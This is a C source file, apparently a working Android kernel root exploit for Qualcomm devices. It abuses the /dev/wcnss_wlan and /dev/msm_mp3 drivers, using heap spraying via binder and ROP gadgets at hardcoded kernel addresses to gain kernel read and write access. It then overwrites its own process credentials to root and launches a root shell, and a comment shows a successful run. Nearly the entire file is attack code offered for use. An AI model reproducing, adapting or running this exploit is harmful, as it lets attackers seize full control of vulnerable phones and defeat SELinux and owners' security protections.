exploit_mp3_bypass_pxn.c

/*
 *  freener.gdx@gmail.com
 *
 *	root@bacon:/data/local/tmp # ./exploit_mp3_bypass_pxn                      
 *	[+] Begin to Test Exploit
 *	[+] uid=0 euid=0
 *	[+] change to system
 *	[+] uid=1000 euid=1000
 *	[+] Spray SLUB Cache
 *	[+] Spray SLUB Cache Down
 *	[+] Trigger Kernel Execution Code
 *	[+] Current SELINUX Status c16a7070 = 1
 *	[+] Open wcanss_wlan again
 *	[+] Write success 0
 *	[+] CRED address : e704b000
 *	[+] Modify CRED
 *	[+] Root Success
 *	root@bacon:/data/local/tmp # 
 */

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <malloc.h>
#include <unistd.h>
#include <sys/prctl.h>

#define MAX_FD 8
#define BINDER_MAX_FDS 1000

#define SELINUX_ENFORCING (0xC16A7070)
#define INIT_TASK_ADDRESS (0xC14F6040)
#define COMM_OFFSET ( 0xC14F635C - INIT_TASK_ADDRESS )
#define TASK_OFFSET ( 0xC14F6218 - INIT_TASK_ADDRESS )
#define PID_OFFSET  ( 0x0 )
#define CRED_OFFSET ( COMM_OFFSET - 8 )

char *name = "freener_pwn0";

/**
 *
 *   ROP_READ
 *   C04DBE88  LDR  R0, [R2]
 *   C04DBE8C  BX   LR
 */
int read_fd = 0;

#define ROP_READ  ( 0xC04DBE88 )
unsigned int kernel_read( unsigned int dummy, unsigned int address )
{
    unsigned int value;
    value = ioctl( read_fd, dummy, address );
    return value;
}

/**
 *   ROP_WRITE GATGAD
 *   C0760FE4   STR R2, [R1]
 *   C0760FE8   BX  LR
 */
#define ROP_WRITE ( 0xC0760FE4 )
int write_fd = 0;
void kernel_write( unsigned int address, unsigned int value )
{
    ioctl( write_fd, address, value );
}


#define AID_SYSTEM 1000


int main( int argc, char **argv )
{
    int fd[MAX_FD];
    int binder_fd[BINDER_MAX_FDS];

    prctl( PR_SET_NAME, (unsigned long)name, 0, 0, 0 );

    printf( "[+] Begin to Test Exploit\n" );
    int i = 0;

    printf( "[+] uid=%d euid=%d\n", getuid(), geteuid() );
    setgid( AID_SYSTEM );
    setuid( AID_SYSTEM );
    printf( "[+] change to system\n" );
    printf( "[+] uid=%d euid=%d\n", getuid(), geteuid() );
    
    printf( "[+] Spray SLUB Cache\n" );
    for( ; i < BINDER_MAX_FDS; i++ ) {
        binder_fd[i] = open( "/dev/binder", O_RDWR );
        if ( binder_fd[i] < 0 ) {
            printf( "[-] Can not open binder %d\n", i ); 
            return -1;
        }
    }

    for ( i=0; i < MAX_FD; i++ ) {
        fd[i] = open( "/dev/msm_mp3", O_RDWR | O_NONBLOCK );
        if ( fd[i] < 0 ) {
            printf( "[-] Can not open /dev/msm_mp3\n" );
            return -1;
        }
    }

    printf( "[+] Spray SLUB Cache Down\n" );

    int fd_wlan;
    char *buffer1 = NULL;
    int message1_len = 512 + 0x150+4  - 4;

    fd_wlan = open( "/dev/wcnss_wlan", O_RDWR );
    if ( fd_wlan < 0 ) {
        printf( "[-] Can not open /dev/wcnss_wlan\n" );
        return -1;
    }

    buffer1 = (char *)malloc( message1_len + 4 );
    if ( buffer1 == NULL ) {
        printf( "[-] No enough memory\n" );
        return -1;
    }
    memset( buffer1, 0, message1_len+4 );


    int length = 512;
    *(unsigned int *)buffer1 = length;
    *(unsigned int *)(buffer1 + length + 0x14C) = ROP_READ;


    int count = 0;
    close( fd[0] );
    count = write( fd_wlan, buffer1, message1_len + 4 );

    printf( "[+] Trigger Kernel Execution Code\n" );
    int result;
    result  = ioctl( fd[1], 0x40046144, SELINUX_ENFORCING );
    if ( result != 0x1 ) {
        printf( "[-] Read Kernel Failed  %x\n", result );
        return -1;
    }

    read_fd = fd[1];
    close( fd_wlan );

    printf( "[+] Current SELINUX Status %x = %x\n",SELINUX_ENFORCING , result );
    fd_wlan = open( "/dev/wcnss_wlan", O_RDWR );
    if ( fd_wlan < 0 ) {
        printf( "[-] Can not open /dev/wcnss_wlan\n" );
        return -1;
    }

    printf( "[+] Open wcanss_wlan again\n" );

    *(unsigned int *)(buffer1 + length + 0x14C) = ROP_WRITE;
    close(fd[4]);
    count = write( fd_wlan, buffer1, message1_len + 4 );
    result = ioctl( fd[5], SELINUX_ENFORCING, 0x0);

    result  = ioctl( fd[1], 0x40046144, SELINUX_ENFORCING );

    if ( result != 0x0) {
        printf( "[-] Write Kernel Failed  %x\n", result );
        return -1;
    }

    write_fd = fd[5];
    printf( "[+] Write success %x\n", result );

    /**
     *   Find MySelf
     */
    unsigned int task = 0;
    task = kernel_read( 0x10000001, (INIT_TASK_ADDRESS + TASK_OFFSET) );
    unsigned int cred = 0;
    unsigned int magic = 0;
    unsigned int magic1 = 0;
    unsigned int comm_address = 0;
    char comm_name[17] = { 0 };
    unsigned int comm_part_one = 0, comm_part_two = 0, comm_part_three = 0;
    do {
        //printf( "[+] TASK Address : %x\n", task );

        comm_address = task - TASK_OFFSET + COMM_OFFSET;
        //printf( "[+] Comm Address : %x\n", comm_address );
        comm_part_one = kernel_read( 0x20000002, task - TASK_OFFSET + COMM_OFFSET );
        comm_part_two = kernel_read( 0x20000002, task - TASK_OFFSET + COMM_OFFSET + 4 );
        comm_part_three  = kernel_read( 0x20000002, task - TASK_OFFSET + COMM_OFFSET +8 );
        (*(unsigned int *)comm_name) = comm_part_one;
        (*(unsigned int *)(comm_name+4)) = comm_part_two;
        (*(unsigned int *)(comm_name+8)) = comm_part_three;

        //printf( "[+] Command line : %s\n", comm_name );

        if ( comm_part_one == 0x65657266 &&
             comm_part_two == 0x5F72656E &&
             comm_part_three == 0x306E7770 ) {
            cred = kernel_read( 0x30000003, task - TASK_OFFSET + CRED_OFFSET ); 
            printf( "[+] CRED address : %x\n", cred );
            magic = kernel_read( 0x40000004, cred + 12 );     
            break;
        }
        task = kernel_read( 0x20000002, task - TASK_OFFSET + TASK_OFFSET ); 
    } while ( task != (INIT_TASK_ADDRESS + TASK_OFFSET) );


    if ( task == INIT_TASK_ADDRESS ) {
        printf( "[-] Do not find myself\n" );
    }
    if ( cred == 0 ) {
        printf( "[-] Do not get CRED address\n" );
        return -1;
    }

    if (  magic != 0x43736564 || magic != 0x44656144 ) {
        magic = 4;
    }
    else {
        magic = 16;
    }

    printf( "[+] Modify CRED\n" );

    for ( i=0; i<17; i++ ) {
        if ( i < 8 ) {
            kernel_write( cred + magic + i*4, 0x0 );
        }
        else if ( i == 8 ) {
            continue;
        }
        else {
            kernel_write( cred + magic + i*4, 0xFFFFFFFF );
        }
    }

    if ( getuid() == 0 ) {
        printf( "[+] Root Success\n" );
        execl( "/system/bin/sh", "/system/bin/sh", NULL );
        return 1;
    }

    printf( "[+] Failed \n" );

    return 0;
}